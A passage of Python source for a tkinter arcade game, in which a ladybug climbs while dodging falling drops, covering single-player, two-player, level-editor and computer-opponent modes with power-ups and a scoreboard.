bug.x>=data.player1X-data.r and bug.x<=data.player1X+data.r:\r\n data.winner= \"player2\"\r\n if bug.y>=data.player2Y-data.r and bug.y<=data.player2Y+data.r:\r\n if bug.x>=data.player2X-data.r and bug.x<=data.player2X+data.r:\r\n data.winner= \"player1\"\r\n\r\ndef drawPowerups(canvas, data):\r\n for bug in data.scaryBug:\r\n bug.draw(canvas, data)\r\n for powerUp in data.powerUps:\r\n powerUp.draw(canvas, data)\r\n for powerUp in data.invincible:\r\n powerUp.draw(canvas, data)\r\n\r\ndef drawHome(canvas, data):\r\n #home button in every screen\r\n canvas.create_image(data.homeX,data.homeY, image= data.home)\r\n\r\ndef checkHome(event, data):\r\n if data.homeY-data.r<= event.y <= data.homeY +data.r:\r\n if data.homeX-data.r<= event.x<=data.homeX+ data.r:\r\n init(data)\r\n \r\ndef coconutShot(data):\r\n if data.level >0 and data.pauseDrops == False:\r\n if data.time%int(data.levelMax/data.level) == 0 or data.time%6==0:\r\n #increases drops as level increases\r\n xPosition1 = random.randint(0,data.Player1Min-data.buffer)\r\n xPosition2 = random.randint(data.Player1Max+data.buffer,\r\n data.width +data.buffer)\r\n data.coconuts.append(Coconuts(xPosition1,0))\r\n data.coconuts.append(Coconuts(xPosition2,0))\r\n xPosition4 = random.randint(data.Player1Min-data.buffer,\r\n data.Player1Max+data.buffer)\r\n data.coconuts.append(Coconuts(xPosition4,0))\r\n if data.time %5 ==0:\r\n xPosition3 = random.randint(0, data.Player1Min-data.buffer)\r\n data.coconuts.append(Coconuts(xPosition3,0))\r\n if data.time % int(24/data.level) ==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\": \r\n data.coconuts.append(Coconuts(data.Player1Min,0))\r\n elif side ==\"r\":\r\n data.coconuts.append(Coconuts(data.Player1Max,0))\r\n powerUpCoconutShot(data)\r\n \r\ndef powerUpCoconutShot(data):\r\n #adds powerUps\r\n #magic #s toallow for powerups to be added at different times\r\n if data.time % 60 == 0 and data.time%120 !=0:\r\n Position = random.choice(data.spotList)\r\n 
data.powerUps.append(PowerUps(Position,0))\r\n if data.time%50 == 0:\r\n Position = random.choice(data.spotList)\r\n data.invincible.append(Invincible(Position,0))\r\n if data.time %100==0:\r\n Position = random.choice(data.spotList)\r\n data.scaryBug.append(ScaryBug(Position,750))\r\n\r\ndef playerKeyPressed(event,data):\r\n if data.level<data.levelMax and event.keysym == \"r\": init(data)\r\n if (event.keysym == \"Left\") and data.cx>=data.Player1Min+(data.lane/2):\r\n data.cx -=(data.lane)/2\r\n elif(event.keysym == \"Right\") and data.cx<=data.Player1Max:\r\n data.cx +=(data.lane)/2\r\n if data.level >= data.levelMax:\r\n #enter name for scoreboard\r\n if len(event.keysym) ==1:\r\n if len(data.name) <15:\r\n data.name += event.keysym\r\n if event.keysym==\"BackSpace\":\r\n data.name = data.name[0:-1]\r\n if event.keysym == \"Return\":\r\n data.scoreList += ((data.score, data.name))\r\n #saves file\r\n writeFile(\"score.txt\",\r\n data.savedScores+str(data.score)+\",\"+data.name+\"\\n\")\r\n data.mode =\"scoreboard\"\r\n \r\n\r\ndef playerMousePressed(event, data): checkHome(event, data)\r\n\r\ndef playerTimerFired(data):\r\n #actually pauses, and moves drops/player\r\n if data.hit== False and data.level<data.levelMax:\r\n data.cy-=data.speed\r\n if data.time%5 ==0: data.score +=data.level\r\n if data.cy < 15: #basically made it to the top\r\n data.level +=1\r\n data.cy = data.Player1Max + 10\r\n data.speed +=2\r\n if data.cy>40: #so drops you can't see don't hit you\r\n data.time +=1\r\n if data.pauseDrops !=True: coconutShot(data)\r\n for powerUp in data.powerUps: powerUp.onTimerFired(data)\r\n hitPause(data)\r\n for powerUp in data.invincible: powerUp.onTimerFired(data)\r\n hitInvincible(data)\r\n for bug in data.scaryBug: bug.onTimerFired(data)\r\n hitScaryBug(data)\r\n for coconut in data.coconuts:\r\n # only want drops to move if not paused\r\n if data.pauseDrops == False: coconut.onTimerFired(data)\r\n if data.beInvincible == False:hit(data)\r\n if 
data.start != None:\r\n if abs(data.start-data.cy) >= 120:\r\n #to limit time for powerups to be active\r\n data.pauseDrops, data.beInvincible = False, False\r\n\r\ndef playerRedrawAll(canvas, data):\r\n # magic #s mainly for screen placement\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_line(0,20, data.width, 20)\r\n for coconut in data.coconuts: coconut.draw(canvas)\r\n drawPowerups(canvas, data)\r\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\r\n canvas.create_text(data.width/6,50, text =\"Level: %d\" %data.level,\r\n font = \"Arial 18 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/6,80, text =\"Score: %d\" %data.score,\r\n font = \"Arial 18 bold\", fill = \"yellow\")\r\n canvas.create_text(2*data.width/3,660,\r\n text =\"\"\"The greater the level, the more points get\r\n added to your score!\"\"\",\r\n font = \"Arial 15 bold\", fill = \"yellow\")\r\n if data.hit== True:\r\n canvas.create_rectangle(0,0,data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.deadScreen)\r\n canvas.create_text(data.width/2,data.height/4,\r\n text = \"You Lose! 
Better Luck Next Time!\",\r\n font = \"Helvetica 23 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2,280, text =\"Score: %d\" %data.score,\r\n font = \"Arial 13 bold\", fill = \"yellow\")\r\n if data.level >= 8: madeIt(canvas, data)\r\n drawHome(canvas, data)\r\n\r\ndef madeIt(canvas, data):# magic #s mainly for screen placement\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,70, text = \"You Made it!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2,100, text =\"Score: %d\" %data.score,\r\n font = \"Arial 15 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2,375, text =\"Congrats! Enter your Name!\",\r\n font = \"Arial 15 bold\", fill = \"yellow\")\r\n canvas.create_rectangle(data.width/2 - 50, 400, data.width/2+50, 450,\r\n fill = \"white\")\r\n canvas.create_text(data.width/2, 425, text = data.name)\r\n \r\n \r\n####################################\r\n# 2Player mode\r\n#################################### \r\ndef drop2Player(data):\r\n #adds drops when not paused\r\n #magic #s are position of where drops are starting\r\n if data.winner ==None and data.pauseDrops == False:\r\n if data.time%15==0:\r\n xPosition1 = random.randint(0,385)\r\n if abs(xPosition1 - 100)>25 and abs(xPosition1 - 360)>25:\r\n #so random drops don't interfere with the lane ones\r\n if data.pause1Drop != True:\r\n data.coconuts1.append(Coconuts(xPosition1,0))\r\n if data.pause2Drop != True:\r\n data.coconuts2.append(Coconuts(xPosition1 +410,0))\r\n if data.time % 12 ==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop != True:\r\n data.coconuts1.append(Coconuts(140,0))\r\n if data.pause2Drop != True:\r\n data.coconuts2.append(Coconuts(540,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop 
!=True:data.coconuts1.append(Coconuts(344,0))\r\n if data.pause2Drop!=True:data.coconuts2.append(Coconuts(755,0))\r\n powerupDrop2Player(data)\r\n\r\ndef powerupDrop2Player(data):\r\n #adds powerups on both screens (in the same position)\r\n if data.time % 45 == 0 and data.time%90 !=0:\r\n #randomize placement\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop!=True:data.powerUps.append(PowerUps(140,0))\r\n if data.pause2Drop!=True:data.powerUps.append(PowerUps(540,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop!=True:data.powerUps.append(PowerUps(344,0))\r\n if data.pause2Drop!=True:data.powerUps.append(PowerUps(755,0))\r\n if data.time%60 == 0:\r\n side = random.choice(data.sides)\r\n if side == \"l\": \r\n if data.pause1Drop!=True:data.invincible.append(Invincible(140,0))\r\n if data.pause2Drop!=True:data.invincible.append(Invincible(540,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop!=True:data.invincible.append(Invincible(344,0))\r\n if data.pause2Drop!=True:data.invincible.append(Invincible(755,0))\r\n if data.time %90==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\": \r\n data.scaryBug.append(ScaryBug(140,750))\r\n data.scaryBug.append(ScaryBug(540,750))\r\n elif side ==\"r\":\r\n data.scaryBug.append(ScaryBug(344,750))\r\n data.scaryBug.append(ScaryBug(755,750))\r\n \r\ndef twoPlayerKeyPressed(event,data):\r\n # controllers for both bugs\r\n if event.keysym == \"r\": init(data)\r\n if data.winner==None:\r\n if (event.keysym == \"a\") and data.onLeft1==False:\r\n data.onLeft1 = True\r\n data.player1X = 150\r\n if(event.keysym == \"d\") and data.onLeft1== True:\r\n data.onLeft1 = False\r\n data.player1X = 330\r\n if (event.keysym == \"Left\") and data.onLeft2==False:\r\n data.onLeft2 = True\r\n data.player2X = 550\r\n if(event.keysym == \"Right\") and data.onLeft2 == True:\r\n data.onLeft2 = False\r\n data.player2X = 750\r\n\r\ndef twoPlayerMousePressed(event, data):\r\n checkHome(event, data)\r\n \r\ndef 
twoPlayerTimerFired(data):\r\n if data.winner == None:\r\n data.player1Y-=data.speed\r\n #<15 signifies that lady bug reached the top\r\n if data.player1Y < 15 and data.player2Y >15:\r\n data.winner= \"player1\"\r\n if data.player1Y>40:\r\n data.time +=1\r\n drop2Player(data)\r\n data.player2Y-=data.speed\r\n if data.player2Y < 15 and data.player1Y> 15:\r\n data.winner= \"player2\"\r\n if data.player2Y>40:\r\n data.time +=1\r\n drop2Player(data)\r\n if data.player1Y < 15 and data.player2Y <15:\r\n data.winner = \"tie\"\r\n for powerUp in data.powerUps: powerUp.onTimerFired(data)\r\n hitPause(data)\r\n for powerUp in data.invincible:powerUp.onTimerFired(data)\r\n hitInvincible(data)\r\n for bug in data.scaryBug:bug.onTimerFired(data)\r\n hitScaryBug(data)\r\n powerupTimerFired(data)\r\n\r\ndef powerupTimerFired(data):\r\n for coconut in data.coconuts1:\r\n if data.pause1Drop == False:\r\n coconut.onTimerFired(data)\r\n hit2Player(data)\r\n for coconut in data.coconuts2:\r\n if data.pause2Drop == False:\r\n coconut.onTimerFired(data) \r\n if data.start1 != None:\r\n # to make powerups only active for set amount of time\r\n if abs(data.start1-data.player1Y) >= 120:\r\n data.pause1Drop = False\r\n data.Invincible1 = False\r\n if data.start2 != None:\r\n if abs(data.start2-data.player2Y) >= 120:\r\n data.pause2Drop = False\r\n data.Invincible2 = False\r\n \r\n\r\ndef twoPlayerRedrawAll(canvas, data):\r\n #magic #s for placement on screen\r\n canvas.create_image(data.width/4, data.height/2, image=data.halfBackground)\r\n canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground)\r\n canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10)\r\n canvas.create_line(0,20, data.width, 20)\r\n for coconut in data.coconuts1: coconut.draw(canvas)\r\n for coconut in data.coconuts2: coconut.draw(canvas)\r\n drawPowerups(canvas, data)\r\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\r\n canvas.create_image(data.player2X, 
data.player2Y, image=data.ladyBug)\r\n canvas.create_text(50,40, text = \"Player 1\",font = \"Arial 15 bold\",\r\n fill = \"yellow\")\r\n canvas.create_text(450,40, text = \"Player 2\",font = \"Arial 15 bold\",\r\n fill = \"yellow\")\r\n winner(canvas, data)\r\n drawHome(canvas, data)\r\n\r\ndef winner(canvas, data):\r\n if data.winner== \"player1\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"You Made it! Player 1\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n elif data.winner== \"player2\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"You Made it! Player 2\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n elif data.winner== \"tie\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"Tie! 
You Both Made it!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n\r\n####################################\r\n# editor mode\r\n####################################\r\n\r\ndef editorKeyPressed(event,data):\r\n if event.keysym == \"r\": init(data)\r\n\r\ndef editorMousePressed(event, data):\r\n #check for click on button for your speed\r\n checkHome(event, data)\r\n if data.easyY-data.r<= event.y <= data.easyY +data.r:\r\n if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:\r\n data.yourSpeed = \"slow\"\r\n data.slow = data.click\r\n data.medium, data.fast = data.notClick, data.notClick\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.yourSpeed = \"medium\"\r\n data.medium = data.click\r\n data.slow, data.fast = data.notClick, data.notClick\r\n if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:\r\n data.yourSpeed = \"fast\"\r\n data.fast = data.click\r\n data.slow, data.medium = data.notClick, data.notClick\r\n checkMiddle(event, data)\r\n checkLast(event, data)\r\n\r\ndef checkMiddle(event, data):\r\n #check for click on button for rain speed\r\n if data.medX-data.r<= event.y <= data.medX + data.r:\r\n if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:\r\n data.rainSpeed = \"drizzle\"\r\n data.drizzle = data.click\r\n data.rain, data.thunderstorm = data.notClick, data.notClick\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.rainSpeed = \"rain\"\r\n data.rain = data.click\r\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\r\n if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:\r\n data.rainSpeed = \"thunderstorm\"\r\n data.thunderstorm = data.click\r\n data.drizzle, data.rain = data.notClick, data.notClick\r\n\r\ndef checkLast(event, data):\r\n #check for click on button for powerups\r\n if data.last-data.r<=event.y<= data.last+data.r:\r\n if data.easyY-2*data.r<= event.x<=data.easyY+2*data.r:\r\n data.powerUpsEditor = True\r\n data.yes, data.no = data.click, data.notClick\r\n if 
data.last-2*data.r<= event.x<=data.last+2*data.r:\r\n data.powerUpsEditor = False\r\n data.no, data.yes = data.click, data.notClick\r\n if data.enter == data.click:\r\n if data.enterX-data.r<=event.y<=data.enterX+data.r:\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.mode=\"levelCreated\"\r\n \r\n \r\n\r\ndef drawButtons(canvas, data):\r\n #makes each button\r\n data.font, data.fill = \"Helvetica 13 bold\", \"yellow\"\r\n canvas.create_text(data.medX,data.YST, text= \"Your Speed:\",\r\n font = data.font,fill =data.fill)\r\n canvas.create_image(data.easyX,data.easyY, image = data.slow)\r\n canvas.create_text(data.easyX,data.easyY, text=\"Slow\", font = data.font)\r\n canvas.create_image(data.medX,data.easyY, image = data.medium)\r\n canvas.create_text(data.medX,data.easyY, text=\"Medium\", font = data.font)\r\n canvas.create_image(data.hardX,data.easyY, image = data.fast)\r\n canvas.create_text(data.hardX,data.easyY, text=\"Fast\",font = data.font)\r\n canvas.create_image(data.easyX,data.medX, image = data.drizzle)\r\n canvas.create_text(data.medX,data.RST, text= \"Rain Speed:\",\r\n font = data.font,fill =data.fill)\r\n canvas.create_text(data.easyX,data.medX, text=\"Drizzle\",font = data.font)\r\n canvas.create_image(data.medX,data.medX, image = data.rain)\r\n canvas.create_text(data.medX,data.medX, text=\"Rain\",font = data.font)\r\n canvas.create_image(data.hardX,data.medX, image = data.thunderstorm)\r\n canvas.create_text(data.hardX,data.medX, text=\"Heavy\",font = data.font)\r\n canvas.create_text(data.medX,data.PUT, text= \"PowerUps?\",\r\n font = data.font,fill =data.fill)\r\n canvas.create_image(data.easyY,data.last, image = data.yes)\r\n canvas.create_text(data.easyY,data.last, text=\"Yes\",font = data.font)\r\n canvas.create_image(data.last,data.last, image = data.no)\r\n canvas.create_text(data.last,data.last, text=\"No\",font = data.font)\r\n changeEnter(canvas, data)\r\n\r\ndef changeEnter(canvas, data):\r\n #makes it so the enter 
button respond to click\r\n if data.powerUpsEditor != None and data.yourSpeed != None and \\\r\n data.rainSpeed != None: data.enter = data.click\r\n canvas.create_image(data.medX,data.enterX, image = data.enter)\r\n canvas.create_text(data.medX,data.enterX, text=\"Enter\",font = data.font)\r\n\r\ndef editorTimerFired(data):\r\n data.editorTime += 1\r\n if data.editorTime %2 ==0:\r\n rainDrop(data)\r\n for drop in data.editorDrops:\r\n drop.onTimerFired(data)\r\n\r\ndef rainDrop(data):\r\n #background drops\r\n xPosition = random.randint(0,data.width)\r\n data.editorDrops.append(Coconuts(xPosition,0))\r\n\r\ndef editorRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_image(data.width/2, data.height/2, image=data.tbg)\r\n for drop in data.editorDrops:\r\n drop.draw(canvas)\r\n canvas.create_text(data.width/2, data.S_P -10, text = \"Edit Your Level!\",\r\n font=\"Arial 23 bold\", fill = \"yellow\")\r\n drawButtons(canvas, data)\r\n drawHome(canvas, data)\r\n####################################\r\n# levelCreated mode\r\n####################################\r\ndef setEverything(data):\r\n #customizing game\r\n if data.yourSpeed == \"slow\": data.speed = 6\r\n elif data.yourSpeed == \"medium\": data.speed = 10\r\n elif data.yourSpeed == \"fast\": data.speed = 14\r\n if data.rainSpeed == \"thunderstorm\": data.rSpeed = 7\r\n elif data.rainSpeed == \"rain\": data.rSpeed = 10\r\n elif data.rainSpeed == \"drizzle\": data.rSpeed = 13\r\n \r\n\r\ndef levelCoconutShot(data):\r\n #adding drops\r\n if data.levelEditorLives >0:\r\n if data.time%int(0.35*data.rSpeed) == 0:\r\n xPosition1 = random.randint(0,data.Player1Min-data.buffer)\r\n xPosition2 = random.randint(770, 870)\r\n xPosition3 = random.randint(220,770)\r\n data.coconuts.append(Coconuts(xPosition3,0))\r\n data.coconuts.append(Coconuts(xPosition1,0))\r\n data.coconuts.append(Coconuts(xPosition2,0))\r\n if data.time % int(0.55*data.rSpeed) ==0:\r\n 
xPosition3 = random.randint(0, 220)\r\n xPosition5 = random.randint(220,770)\r\n data.coconuts.append(Coconuts(xPosition3,0))\r\n data.coconuts.append(Coconuts(xPosition5,0))\r\n if data.time % int(data.rSpeed) ==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\": \r\n data.coconuts.append(Coconuts(3*data.width/8-20,0))\r\n elif side ==\"r\":\r\n data.coconuts.append(Coconuts(7*data.width/8+40,0))\r\n xPosition4= random.randint(220,770)\r\n data.coconuts.append(Coconuts(xPosition4,0))\r\n \r\n levelPowerUp(data)\r\n\r\ndef levelPowerUp(data):\r\n # adding power-ups only if clicked yes\r\n if data.powerUpsEditor == True:\r\n if data.time % 20 == 0 and data.time%40 !=0:\r\n Position = random.choice(data.spotList)\r\n data.powerUps.append(PowerUps(Position,0))\r\n if data.time%30 == 0:\r\n Position = random.choice(data.spotList)\r\n data.invincible.append(Invincible(Position,0))\r\n if data.time %35==0:\r\n Position = random.choice(data.spotList)\r\n data.scaryBug.append(ScaryBug(Position,750))\r\n\r\ndef levelCreatedKeyPressed(event,data):\r\n if event.keysym == \"r\": init(data)\r\n if data.levelEditorLives>0:\r\n if (event.keysym == \"Left\") and data.cx>=317:\r\n data.cx -=(data.lane/2)\r\n elif(event.keysym == \"Right\") and data.cx<=740:\r\n data.cx +=(data.lane/2)\r\n\r\ndef levelCreatedMousePressed(event, data):\r\n checkHome(event, data)\r\n\r\ndef levelCreatedTimerFired(data):\r\n setEverything(data)\r\n if data.levelEditorLives>0:\r\n data.cy-=data.speed\r\n if data.cy < 15:\r\n data.level +=1\r\n if data.cy>40:\r\n data.time +=1\r\n if data.pauseDrops !=True: levelCoconutShot(data)\r\n if data.powerUpsEditor == False:\r\n for coconut in data.coconuts: coconut.onTimerFired(data)\r\n hit(data)\r\n if data.powerUpsEditor == True:\r\n for powerUp in data.powerUps: powerUp.onTimerFired(data)\r\n hitPause(data)\r\n for powerUp in data.invincible: powerUp.onTimerFired(data)\r\n hitInvincible(data)\r\n for bug in data.scaryBug: bug.onTimerFired(data)\r\n 
hitScaryBug(data)\r\n for coconut in data.coconuts:\r\n if data.pauseDrops == False:coconut.onTimerFired(data)\r\n if data.beInvincible == False: hit(data)\r\n if data.start != None:\r\n #to make powerups only active for set amount of time\r\n if abs(data.start-data.cy) >= 120:\r\n data.pauseDrops, data.beInvincible = False, False\r\n\r\n\r\ndef levelCreatedRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_line(0,20, data.width, 20)\r\n for coconut in data.coconuts: coconut.draw(canvas)\r\n if data.powerUpsEditor == True: drawPowerups(canvas, data)\r\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\r\n canvas.create_text(data.width/6,100,\r\n text =\"Total Lives: %d\" %data.levelEditorLives,\r\n font = \"Arial 20 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2,660,\r\n text =\"\"\"You lose a life for hitting a drop\r\n & don't get eaten!\"\"\",\r\n font = \"Arial 15 bold\", fill = \"yellow\")\r\n if data.levelEditorLives <=0:\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.deadScreen)\r\n canvas.create_text(data.width/2,data.height/4,\r\n text = \"You Lose! 
Better Luck Next Time!\",\r\n font = \"Helvetica 23 bold\", fill = \"yellow\") \r\n if data.level > 1: winEditor(canvas, data)\r\n drawHome(canvas, data)\r\n\r\ndef winEditor(canvas, data):\r\n #screen for when you win\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"You Made it!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n\r\n####################################\r\n# AI Difficulty Mode\r\n####################################\r\ndef difficultyKeyPressed(event,data):\r\n if event.keysym == \"r\": init(data)\r\n\r\ndef drawDifficulties(canvas, data):\r\n canvas.create_text(data.medX,data.AITY, text= \"Computer Difficulty:\",\r\n font=\"Arial 23 bold\", fill = \"yellow\") \r\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\r\n canvas.create_text(data.easyX,data.easyY, text=\"Easy\")\r\n canvas.create_image(data.medX, data.easyY, image=data.medium)\r\n canvas.create_text(data.medX,data.easyY, text=\"Medium\")\r\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\r\n canvas.create_text(data.hardX,data.easyY, text=\"Hard\")\r\n if data.difficulty !=None:\r\n data.enter = data.click\r\n canvas.create_image(data.medX, data.enterY, image=data.enter)\r\n canvas.create_text(data.medX,data.enterY, text=\"Enter\")\r\n\r\ndef difficultyMousePressed(event, data):\r\n #sets up buttons to customize\r\n checkHome(event, data)\r\n if data.easyY-data.r<= event.y <= data.easyY +data.r:\r\n if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:\r\n data.difficulty = data.difS\r\n data.slow = data.click\r\n data.medium, data.fast = data.notClick, data.notClick\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.difficulty = data.difM\r\n data.medium = data.click\r\n data.slow, data.fast = data.notClick, data.notClick\r\n if 
data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:\r\n data.difficulty = data.difH\r\n data.fast = data.click\r\n data.slow, data.medium = data.notClick, data.notClick\r\n if data.enter == data.click:\r\n if data.enterY-data.r<=event.y<=data.enterY+data.r:\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.mode=\"AI\"\r\n\r\ndef difficultyTimerFired(data):\r\n # makes normal background rain\r\n data.editorTime += 1\r\n if data.editorTime %2 ==0:\r\n rainDrop(data)\r\n for drop in data.editorDrops:\r\n drop.onTimerFired(data)\r\n\r\ndef rainDrop(data):\r\n xPosition = random.randint(0,data.width)\r\n data.editorDrops.append(Coconuts(xPosition,0))\r\n\r\ndef difficultyRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_image(data.width/2, data.height/2, image=data.tbg)\r\n for drop in data.editorDrops:\r\n drop.draw(canvas)\r\n drawDifficulties(canvas, data)\r\n drawHome(canvas, data)\r\n\r\n####################################\r\n# AI mode\r\n####################################\r\ndef hitAI1(data, distance):\r\n for coconut in data.coconutsAI1:\r\n # so AI switches by itself\r\n if (data.player1Y-data.r - coconut.y<=distance) and \\\r\n data.switchOnProgress == False:\r\n if coconut.x>=data.player1X-data.r and \\\r\n coconut.x<=data.player1X+data.r or AISwitchBug(data,distance)==True:\r\n testInt = random.randint(0,9)\r\n # to have different levels of difficulty\r\n if testInt<= data.difficulty:\r\n data.switchOnProgress= True\r\n if data.player1X == 150:\r\n data.player1X = 340\r\n else:\r\n data.player1X = 150\r\n data.switchOnProgress= False\r\n if coconut.y>=data.player1Y-data.r and coconut.y<=data.player1Y+data.r:\r\n if coconut.x>=data.player1X-data.r and \\\r\n coconut.x<=data.player1X+data.r:\r\n data.player1Y+=50\r\n data.coconutsAI1.remove(coconut)\r\n\r\ndef AISwitchBug(data, distance):\r\n #AI to move for spider\r\n for scaryBug in data.scaryBug:\r\n if 
(data.player1Y-data.r - scaryBug.y<=distance) and \\\r\n data.switchOnProgress == False:\r\n if scaryBug.x>=data.player1X-data.r and \\\r\n scaryBug.x<=data.player1X+data.r:\r\n return True\r\n\r\ndef hitAI2(data, distance):\r\n # check if human controlled player hits drops\r\n for coconut in data.coconutsAI2:\r\n if coconut.y>=data.player2Y-data.r and coconut.y<=data.player2Y+data.r:\r\n if coconut.x>=data.player2X-data.r and \\\r\n coconut.x<=data.player2X+data.r:\r\n data.player2Y+=50 \r\n data.coconutsAI2.remove(coconut)\r\n \r\ndef coconutShotAI(data):\r\n if data.winner ==None:\r\n # randomize position of drops off of tree\r\n if data.time%15==0:\r\n xPosition1 = random.randint(0,385)\r\n if abs(xPosition1 - 100)>40 and abs(xPosition1 - 360)>40:\r\n if data.pause1Drop != True:\r\n data.coconutsAI1.append(Coconuts(xPosition1,0))\r\n if data.pause2Drop != True:\r\n data.coconutsAI2.append(Coconuts(xPosition1 +410,0))\r\n if data.time%8 ==0:\r\n xPosition2 = random.randint(0,80)\r\n xPosition3 = random.randint(364, 385)\r\n if data.pause1Drop != True:\r\n data.coconutsAI1.append(Coconuts(xPosition2,0))\r\n data.coconutsAI1.append(Coconuts(xPosition3,0)) \r\n if data.pause2Drop != True:\r\n data.coconutsAI2.append(Coconuts(xPosition2+410,0))\r\n data.coconutsAI2.append(Coconuts(xPosition3+410,0))\r\n addExtraCoconut(data)\r\n addPowerUpsAI(data)\r\n\r\ndef addExtraCoconut(data):\r\n #adds drops to edges of trees\r\n if data.time % (18) ==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop != True:\r\n data.coconutsAI1.append(Coconuts(140,0))\r\n if data.pause2Drop != True:\r\n data.coconutsAI2.append(Coconuts(540,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop != True:\r\n data.coconutsAI1.append(Coconuts(344,0))\r\n if data.pause2Drop != True:\r\n data.coconutsAI2.append(Coconuts(755,0))\r\n if data.time % 37 == 0:\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop != True:\r\n 
data.powerUps.append(PowerUps(140,0))\r\n if data.pause2Drop != True:\r\n data.powerUps.append(PowerUps(550,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop != True:\r\n data.powerUps.append(PowerUps(344,0))\r\n if data.pause2Drop != True:\r\n data.powerUps.append(PowerUps(755,0))\r\n \r\ndef addPowerUpsAI(data):\r\n #randomly add powerups on tree\r\n if data.time%33 == 0:\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop != True:\r\n data.invincible.append(Invincible(140,0))\r\n if data.pause2Drop != True:\r\n data.invincible.append(Invincible(550,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop != True:\r\n data.invincible.append(Invincible(344,0))\r\n if data.pause2Drop != True:\r\n data.invincible.append(Invincible(755,0))\r\n if data.time %66==0:\r\n side = random.choice(data.sides) \r\n if side == \"l\":\r\n data.scaryBug.append(ScaryBug(140,750))\r\n data.scaryBug.append(ScaryBug(550,750))\r\n elif side ==\"r\":\r\n data.scaryBug.append(ScaryBug(344,750))\r\n data.scaryBug.append(ScaryBug(750,750))\r\n\r\n \r\ndef AIKeyPressed(event,data):\r\n if event.keysym == \"r\": init(data)\r\n if data.winner==None:\r\n if (event.keysym == \"Left\") and data.onLeft1==False:\r\n data.onLeft1 = True\r\n data.player2X = 550\r\n elif(event.keysym == \"Right\") and data.onLeft1== True:\r\n data.onLeft1 = False\r\n data.player2X = 750\r\n\r\ndef AIMousePressed(event, data): checkHome(event, data)\r\ndef AITimerFired(data):\r\n if data.winner == None:\r\n #want to check hit twice (before & after elements move)\r\n if data.Invincible1 == False:hitAI1(data, 31)\r\n if data.Invincible2 == True: pass\r\n elif data.Invincible2 == False:hitAI2(data, 31)\r\n for coconut in data.coconutsAI1:\r\n if data.pause1Drop == False:coconut.onTimerFired(data)\r\n for coconut in data.coconutsAI2:\r\n if data.pause2Drop == False:coconut.onTimerFired(data)\r\n # second check\r\n if data.Invincible1 == False:hitAI1(data,13)\r\n if data.Invincible2 == True:pass\r\n 
